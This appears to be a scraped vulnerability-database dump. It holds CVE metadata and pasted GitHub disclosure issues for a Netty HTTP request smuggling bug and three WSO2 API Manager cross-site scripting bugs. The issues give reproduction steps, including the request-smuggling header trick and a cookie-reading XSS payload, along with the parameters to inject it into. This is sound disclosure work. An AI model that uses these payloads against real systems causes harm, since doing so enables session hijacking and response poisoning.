"https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jdordonezn/CVE-2020-72381/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://netty.io/news/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netty:netty:4.1.43:*:*:*:*:*:*:*", "matchCriteriaId": "61DFEEC7-2603-4815-AF13-179125C16222", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "645A908C-18C2-4AB1-ACE7-3969E3A552A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_text-only_advisories:-:*:*:*:*:*:*:*", "matchCriteriaId": "81E5B0F1-E150-4F22-9A9C-FB477540874C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_application_runtimes_text-only_advisories:-:*:*:*:*:*:*:*", "matchCriteriaId": "4B03F7B3-8E34-4494-9B03-F9D36655CEE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/jdordonezn/CVE-2020-72381/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jdordonezn", "CVE-2020-72381" ]
Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. **Steps to reproduce the vulnerability** 1. The hacker send a request with both "[space]Transfer-Encoding: chunked" header and "Content-Length" header. 2. The legitimate user send a normal request 2. The ELB (Elastic load balancer) send first the request of hacker to Netty and consecutively thr normal request. 3. Netty decodes request by incorrect TE ([space]Transfer-Encoding: chunked") sending to hacker the response that corresponds until null byte and send to legitimate user the response of chunked request from hacker. - **Attack Payload** ![1](https://user-images.githubusercontent.com/20976774/73140920-34750d80-404c-11ea-8987-e32226730ead.png) - **Normal request** ![2](https://user-images.githubusercontent.com/20976774/73140924-3f2fa280-404c-11ea-84d5-eb6f6ce620bf.png) - **Processing of netty** ![3](https://user-images.githubusercontent.com/20976774/73140928-4787dd80-404c-11ea-80d9-e8e028684837.png)
HTTP Request Smuggling in Netty - 4.1.43.Final
https://api.github.com/repos/jdordonezn/CVE-2020-72381/issues/1/comments
1
2020-01-26T19:58:20Z
2020-02-21T20:06:55Z
https://github.com/jdordonezn/CVE-2020-72381/issues/1
555,279,227
1
1,033
CVE-2019-20440
2020-01-28T00:15:10.823
An issue was discovered in WSO2 API Manager 2.6.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the update API documentation feature of the API Publisher.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 2.5, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20440-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20440-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/24
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Multiple reflected <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">WSO2 API Manager</a> Version: <a href="https://docs.wso2.com/display/AM260/About+this+Release">2.6.0</a> Homepage: https://wso2.com/ Severity: Low Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version 2.6.0 Product. <strong>Issue 01: Multiple reflected cross site scripting:</strong> ![Picture1](https://user-images.githubusercontent.com/13975575/72716101-aacec700-3b97-11ea-999c-171020e8fd15.png) Figure 01: Update the existing document information created. (here API Name is ‘reflected XSS’) ![Picture2](https://user-images.githubusercontent.com/13975575/72716103-ab675d80-3b97-11ea-859a-8e349cb807fa.png) Figure 02: Add XSS payload to the variable “docName” ![Picture3](https://user-images.githubusercontent.com/13975575/72716105-ab675d80-3b97-11ea-8076-380116f4cc0c.png) Figure 03: HTTP Response for the modified “docName” variable with XSS payload. ![Picture4](https://user-images.githubusercontent.com/13975575/72716107-abfff400-3b97-11ea-9cf1-3d7920462298.png) Figure 04: Injected XSS payload, “><script>alert(document.cookie)</script> gets reflected in the browser response. <strong>Issue 02 & 03:</strong> ![Picture5](https://user-images.githubusercontent.com/13975575/72716108-abfff400-3b97-11ea-8665-2bb6e5d4256d.png) Figure 05: Injected XSS payload in variable docName, version and apiName gets reflected in the Response ![Picture6](https://user-images.githubusercontent.com/13975575/72716111-adc9b780-3b97-11ea-850a-16b7d2c71f8e.png) Figure 06: Injected payload gets reflected in the browser THREE times (THREE places) ![Picture7](https://user-images.githubusercontent.com/13975575/72716112-ae624e00-3b97-11ea-93a8-fd94ce4f3671.png) Figure 07: Page Looks after executing the injected XSS payload --- <strong>Reproducing Steps</strong> 1. Login to the application `(admin/admin)` through the login <a href="https://192.168.107.2:9443/publisher/site/pages/login.jag">URL.</a> 2. Go to the <a href="https://192.168.0.138:9443/publisher/info?name=test&version=test&provider=admin">page</a> where an API is already created 3. Create a document for the created API by clicking on `“Add New Document”` button. 4. Created documents are listed as shown in figure 01 5. Click on `“Update”` button to update document information. 6. Add relevant information and capture the request in proxy to add XSS payload `“><script>alert(document.cookie)</script>”` in `“docName”` variable. 7. Now, Injected XSS payload gets executed in the browser. Note: Similarly, add XSS payload to the other vulnerable variables `“version”` and `“apiName”` which reflects in the browser. --- <strong>Timeline</strong> 2019-07-05 – Discovered in <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">`WSO2 API Manager v2.6.0`</a> 2019-07-06 – Reported to <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-23 - Closed the issue in <a href="https://www.intigriti.com/">intigriti</a> platform saying it as "out of scope" 2019-07-26 – Reported to security@wso2.com 2019-07-29 – Got response from WSO2 security team, "Thank you for reaching out to WSO2 Platform Security Team. We will evaluate your finding and get back to you as soon as possible with our feedback." 2019-08-05 – Got mail from WSO2 team saying, "We were able to reproduce the issue with APIM 2.6.0. We will fix this and provide you with an update." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement is scheduled 2019-10-08 - Got mail saying, "Customer Security Announcement for the issues are scheduled by the end of September" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">WSO2-2019-0644,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645">WSO2-2019-0645,</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647">WSO2-2019-0647</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0646 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Multiple Reflected Cross Site Scripting (XSS) in ''docName', 'version' and 'apiName' of created API document using XSS payload' | WSO2 API Manager version 2.6.0 | WSO2 Product
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/24/comments
0
2020-01-20T09:44:04Z
2020-01-20T11:52:18Z
https://github.com/cybersecurityworks/Disclosed/issues/24
552,183,556
24
1,034
CVE-2019-20441
2020-01-28T00:15:10.883
An issue was discovered in WSO2 API Manager 2.6.0. A potential Stored Cross-Site Scripting (XSS) vulnerability has been identified in the 'implement phase' of the API Publisher.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20441-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20441-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/23
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
# Details: WSO2 Product Bug Report Bug Name: Stored <a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)">Cross Site Scripting (XSS)</a> Product Name: <a href="https://wso2.com/">WSO2</a> Server: <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">WSO2 API Manager</a> Version: <a href="https://docs.wso2.com/display/AM260/About+this+Release">2.6.0</a> Homepage: https://wso2.com/ Severity: Medium Status: Fixed Exploitation Requires Authentication?: <strong>yes</strong> # AFFECTED PRODUCTS: [1] WSO2 API Manager # Description: Cross Site Scripting (XSS) vulnerability in WSO2 API Manager Product. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies which means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. # Proof of concept: (POC) The following Vulnerability is tested on WSO2 API Manager version 2.6.0 Product. Issue 01: Stored cross site scripting: ![Picture1](https://user-images.githubusercontent.com/13975575/72707112-af8a7f80-3b85-11ea-9f8c-62ac26a4b289.png) Figure 01: Design an API with valid values in the required fields of the page ![Picture2](https://user-images.githubusercontent.com/13975575/72707114-b0231600-3b85-11ea-8088-4874339000c5.png) Figure 02: Click on “Next Implement” after completing the forms with valid information ![Picture3](https://user-images.githubusercontent.com/13975575/72707115-b0231600-3b85-11ea-837f-69cf9eb3ca27.png) Figure 03: valid HTTP Request captured in the proxy with filled information ![Picture4](https://user-images.githubusercontent.com/13975575/72707116-b0231600-3b85-11ea-81ed-b647df6d15fb.png) Figure 04: ‘Context’ variable is added with XSS Payload, “><script>alert(document.cookie)</script> ![Picture5](https://user-images.githubusercontent.com/13975575/72707117-b0bbac80-3b85-11ea-8825-442dead1d514.png) Figure 05: Submitted the API details to the server with XSS payload ![Picture6](https://user-images.githubusercontent.com/13975575/72707118-b0bbac80-3b85-11ea-8eda-a0ebf2e71e9c.png) Figure 06: XSS Payload gets stored and reflects whenever the user views the <a href="https://192.168.0.138:9443/publisher/info?name=test324&version=v3&provider=admin">page.</a> ![Picture7](https://user-images.githubusercontent.com/13975575/72707119-b1544300-3b85-11ea-9fff-44f075db82d4.png) Figure 07: Stored XSS payload in the source code --- <strong>Reproducing Steps</strong> 1. Login to the Application. 2. Go to the <a href="https://192.168.0.138:9443/publisher/design">URL</a> for creating an API. 3. Fill all the required information and click on “Next: Implement” 4. Capture the HTTP request in the proxy and add XSS payload “XSS”><script>alert(document.cookie)</script>” to the “context” variable 5. Deploy the prototype with added XSS payload 6. Injected XSS payload gets reflected whenever the user visits or reloads the <a href="https://192.168.0.138:9443/publisher/info?name=test324&version=v3&provider=admin">page.</a> --- <strong>Timeline</strong> 2019-07-05 – Discovered in <a href="https://docs.wso2.com/display/AM260/WSO2+API+Manager+Documentation">`WSO2 API Manager v2.6.0`</a> 2019-07-06 – Reported to <a href="https://www.intigriti.com/">intigriti</a> platform. 2019-07-23 - Closed the issue in <a href="https://www.intigriti.com/">intigriti</a> platform saying it as "out of scope" 2019-07-26 – Reported to security@wso2.com 2019-07-26 – Got instant response from WSO2 security team, "Thanks for sending new issues. Let us evaluate them and get back to you with the results." 2019-08-05 – Got mail from WSO2 team saying, "We were able to reproduce the issue with APIM 2.6.0. We will fix this and provide you with an update." 2019-08-13 - Fixing in all affected versions 2019-09-10 - Customer Announcement is scheduled 2019-10-08 - Got mail saying, "Customer Security Announcement for the issues are scheduled by the end of September" 2019-11-04 - Customer Announcement is done. Public Announcement is done. Please <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647">refer </a>[1] for Security Advisory <strong>Note:</strong> Since, we have contributed on <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265">WSO2-2017-0265,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0616">WSO2-2019-0616, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0633">WSO2-2019-0633, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0634">WSO2-2019-0634, </a><a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0635">WSO2-2019-0635,</a> <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0644">WSO2-2019-0644</a> and <a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0645">WSO2-2019-0645</a> to WSO2 team, our name already got listed in their security acknowledgment <a href="https://docs.wso2.com/display/Security/Acknowledgments">page</a> [2] [1] https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0647 [2] https://docs.wso2.com/display/Security/Acknowledgments --- <strong>Discovered by:</strong> <a href="sathish.co.in">Sathish Kumar Balakrishnan</a> from <a href="http://www.cybersecurityworks.com">Cyber Security Research Lab</a>
Stored Cross Site Scripting (XSS) in ' HTTP POST request with a harmful request parameter for context' | WSO2 API Manager version 2.6.0 | WSO2 Product
https://api.github.com/repos/cybersecurityworks/Disclosed/issues/23/comments
0
2020-01-20T07:37:31Z
2020-01-20T09:42:10Z
https://github.com/cybersecurityworks/Disclosed/issues/23
552,119,549
23
1,035
CVE-2019-20442
2020-01-28T00:15:10.930
An issue was discovered in WSO2 API Manager 2.6.0, WSO2 Enterprise Integrator 6.5.0, WSO2 IS as Key Manager 5.7.0, and WSO2 Identity Server 5.8.0. A potential stored Cross-Site Scripting (XSS) vulnerability in roleToAuthorize has been identified in the registry UI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 0.9, "impactScore": 2.5, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20442-wso2.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://cybersecurityworks.com/zerodays/cve-2019-20442-wso2.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0636" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybersecurityworks/Disclosed/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wso2:api_manager:2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC168B6A-B15A-4C3B-A38D-C0B65F24F333", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:enterprise_integrator:6.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "4FCA89E3-F37E-494E-AD46-B9A04E608908", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "60781FE4-38A3-4FEA-9D8B-CADE4B535974", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:wso2:identity_server:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B169832-A746-49A6-8E92-06624AA9B13A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cybersecurityworks/Disclosed/issues/25
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cybersecurityworks", "Disclosed" ]
